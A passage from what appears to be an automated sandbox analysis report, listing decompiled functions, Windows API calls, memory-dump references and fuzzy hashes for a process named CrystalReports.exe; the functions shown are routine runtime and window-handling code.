                                                            • Instruction Fuzzy Hash: 22D0C7B37117222A651075FA3CE1FF70A8CDD95795354087EF700E2941DD55DC4111A8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006B9800, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 58%
                                                            			E006B9800(void* __eflags) {
				intOrPtr* _t2;
				void* _t4;
				void* _t5;

				_t2 = E00414020(_t4, _t5, GetModuleHandleW(L"user32.dll"), L"DisableProcessWindowsGhosting");
				if(_t2 != 0) {
					return  *_t2();
				}
				return _t2;
			}






                                                            0x006b9810
                                                            0x006b9817
                                                            0x00000000
                                                            0x006b9819
                                                            0x006b981b

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,006C46BE,00000001,00000000,006C46F1,?,?,000000EC,00000000), ref: 006B980A
                                                              • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: DisableProcessWindowsGhosting$user32.dll
                                                            • API String ID: 1646373207-834958232
                                                            • Opcode ID: 1d0e836530d80ee037b6803170de1fe8933ba33f6b77be0c16a5e781bf2d5ad3
                                                            • Instruction ID: a737f6cb342469133653c2ad22e7ce718afd724c013acdac2058dbbd1ad6bbf7
                                                            • Opcode Fuzzy Hash: 1d0e836530d80ee037b6803170de1fe8933ba33f6b77be0c16a5e781bf2d5ad3
                                                            • Instruction Fuzzy Hash: 99B092F0240331101C1072B33C02ACA080A08CBB497024C2A3720A108ADD4880C01239
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Analysis Process: CrystalReports.exe PID: 6532 Parent PID: 5636 CrystalReports.exeCOMMON

                                                            Executed Functions

                                                            Function 6E2CDBEE, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 6E2CDC01
                                                              • Part of subcall function 6E2DCF56: RtlFreeHeap.NTDLL(00000000,00000000,?,6E2CDC06,?,?,?,6E2C26C9,?), ref: 6E2DCF6C
                                                              • Part of subcall function 6E2DCF56: GetLastError.KERNEL32(?,?,6E2CDC06,?,?,?,6E2C26C9,?), ref: 6E2DCF7E
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.564125749.000000006E0F1000.00000020.00020000.sdmp, Offset: 6E0F0000, based on PE: true
                                                            • Associated: 00000007.00000002.564090675.000000006E0F0000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000007.00000002.564667817.000000006E418000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000007.00000002.564872178.000000006E4F0000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000007.00000002.564907282.000000006E4F3000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000007.00000002.564948571.000000006E4F7000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000007.00000002.564971172.000000006E4FB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000007.00000002.564993656.000000006E500000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ErrorFreeHeapLast_free
                                                            • String ID:
                                                            • API String ID: 1353095263-0
                                                            • Opcode ID: 668878cdcf64439b5fcd09d1611cb81abf6e5e2de21df30c962cfab0370d297a
                                                            • Instruction ID: e8248f399a53bed059e907cb7e32d4dffcbbd238ac203de68351431c6838168c
                                                            • Opcode Fuzzy Hash: 668878cdcf64439b5fcd09d1611cb81abf6e5e2de21df30c962cfab0370d297a
                                                            • Instruction Fuzzy Hash: 33C08C3100020CBBCB108B81C806B8E7BA9DB80268F200044E5181B340CBB1EE089684
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 6E2BEB08, Relevance: 6.0, APIs: 4, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,6E2BEC28,6E449ABC), ref: 6E2BEB0D
                                                            • UnhandledExceptionFilter.KERNEL32(6E2BEC28,?,6E2BEC28,6E449ABC), ref: 6E2BEB16
                                                            • GetCurrentProcess.KERNEL32(C0000409,?,6E2BEC28,6E449ABC), ref: 6E2BEB21
                                                            • TerminateProcess.KERNEL32(00000000,?,6E2BEC28,6E449ABC), ref: 6E2BEB28
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.564125749.000000006E0F1000.00000020.00020000.sdmp, Offset: 6E0F0000, based on PE: true
                                                            • Associated: 00000007.00000002.564090675.000000006E0F0000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000007.00000002.564667817.000000006E418000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000007.00000002.564872178.000000006E4F0000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000007.00000002.564907282.000000006E4F3000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000007.00000002.564948571.000000006E4F7000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000007.00000002.564971172.000000006E4FB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000007.00000002.564993656.000000006E500000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                            • String ID:
                                                            • API String ID: 3231755760-0
                                                            • Opcode ID: 123212f609b0c78342f95ea0b918f7e421e87b5e5d0b281fb89652352fd1e398
                                                            • Instruction ID: 33d83dbcf48a199ffeb7f79cc1d0a1f5a9f0d9c47317fc07da321b42d96ba17b
                                                            • Opcode Fuzzy Hash: 123212f609b0c78342f95ea0b918f7e421e87b5e5d0b281fb89652352fd1e398
                                                            • Instruction Fuzzy Hash: 9DD00273044A48AFDE413BF1E90FAE93F29EB4E656F008410F70A86852DB7164528BA6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6E2C2500, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 132COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _ValidateLocalCookies.LIBCMT ref: 6E2C2537
                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 6E2C253F
                                                            • _ValidateLocalCookies.LIBCMT ref: 6E2C25C8
                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 6E2C25F3
                                                            • _ValidateLocalCookies.LIBCMT ref: 6E2C2648
                                                            • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 6E2C265E
                                                            • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 6E2C2673
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.564125749.000000006E0F1000.00000020.00020000.sdmp, Offset: 6E0F0000, based on PE: true
                                                            • Associated: 00000007.00000002.564090675.000000006E0F0000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000007.00000002.564667817.000000006E418000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000007.00000002.564872178.000000006E4F0000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000007.00000002.564907282.000000006E4F3000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000007.00000002.564948571.000000006E4F7000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000007.00000002.564971172.000000006E4FB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000007.00000002.564993656.000000006E500000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record___vcrt_initialize_locks___vcrt_uninitialize_locks
                                                            • String ID: csm
                                                            • API String ID: 1385549066-1018135373
                                                            • Opcode ID: 553d815ca6c73973d4d2da3a255991915ca94fa25890bc0ef369f417f2a352fb
                                                            • Instruction ID: 725b5577a5bb804d003afb877dd6d9888ccb0d150260bc6941156955e097ffa3
                                                            • Opcode Fuzzy Hash: 553d815ca6c73973d4d2da3a255991915ca94fa25890bc0ef369f417f2a352fb
                                                            • Instruction Fuzzy Hash: 1A41137990060EEBCF80DFA8C850ADE7BA6EF45B58F109651D8145B241EF31D901CBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%